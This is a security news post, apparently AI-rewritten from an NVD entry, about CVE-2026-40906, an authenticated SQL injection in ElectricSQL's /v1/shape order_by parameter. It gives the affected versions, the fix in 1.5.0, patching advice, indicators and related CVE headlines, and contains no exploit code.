CRITICAL SQLi in ElectricSQL: Full Database Compromise
The National Vulnerability Database has disclosed CVE-2026-40906, a critical SQL injection vulnerability in ElectricSQL, a PostgreSQL sync engine. Affecting versions 1.1.12 up to, but not including, 1.5.0, this flaw resides in the /v1/shape API’s order_by parameter.
This isn’t a theoretical risk; it’s a full-blown database compromise. According to the National Vulnerability Database, any authenticated user can exploit this error-based SQL injection to read, write, and even destroy the entire contents of the underlying PostgreSQL database through crafted ORDER BY expressions. The CVSS score of 9.9 (CRITICAL) accurately reflects the severity of this direct path to data exfiltration and integrity violation.
ElectricSQL versions 1.5.0 and later contain the fix. Organizations leveraging ElectricSQL as a Postgres sync engine must prioritize immediate patching. This type of vulnerability is a gift to attackers, turning a standard authenticated user into a database administrator with minimal effort. It’s a stark reminder that even internal APIs, when exposed to authenticated users, demand the same rigorous security scrutiny as public-facing endpoints.
What This Means For You
- If your organization uses ElectricSQL, you need to check your version immediately. If you're running any version between 1.1.12 and 1.4.x, patch to 1.5.0 or higher without delay. This isn't a 'monitor for exploitation' scenario; it's a 'fix it now' directive. Audit logs for anomalous database activity, especially around `ORDER BY` clauses, if you were running vulnerable versions.
Related ATT&CK Techniques
🛡️ Detection Rules
3 rules · 6 SIEM formats3 detection rules auto-generated for this incident, mapped to MITRE ATT&CK. Sigma YAML is free — export to any SIEM format via the Intel Bot.
CVE-2026-40906 - ElectricSQL Order By SQL Injection
Indicators of Compromise
| ID | Type | Indicator |
|---|---|---|
| CVE-2026-40906 | SQLi | ElectricSQL /v1/shape API 'order_by' parameter |
| CVE-2026-40906 | SQLi | ElectricSQL versions 1.1.12 to before 1.5.0 |
| CVE-2026-40906 | Information Disclosure | Read full contents of underlying PostgreSQL database |
| CVE-2026-40906 | Code Injection | Write and destroy full contents of underlying PostgreSQL database |
Written by SCW Vulnerability Desk
Source & Attribution
| Source Platform | NVD |
| Channel | National Vulnerability Database |
| Published | April 22, 2026 at 00:16 UTC |
This content was AI-rewritten and enriched by Shimi's Cyber World based on the original source. All intellectual property rights remain with the original author.
Believe this infringes your rights? Submit a takedown request.
Related Posts
HKUDS OpenHarness Default Config Exposes Systems (CVE-2026-6823)
CVE-2026-6823 — HKUDS OpenHarness prior to PR #147 remediation contains an insecure default configuration vulnerability where remote channels inherit allow_from = ["*"] permitting arbitrary remote...
Critical AVideo XSS Vulnerability Exposes Admin Settings
CVE-2026-40925 — WWBN AVideo is an open source video platform. In versions 29.0 and prior, `objects/configurationUpdate.json.php` (also routed via `/updateConfig`) persists dozens of global site...
Critical RCE in AVideo YPTSocket Plugin: Unauthenticated Account Takeover
CVE-2026-40911 — WWBN AVideo is an open source video platform. In versions 29.0 and prior, the YPTSocket plugin's WebSocket server relays attacker-supplied JSON message bodies...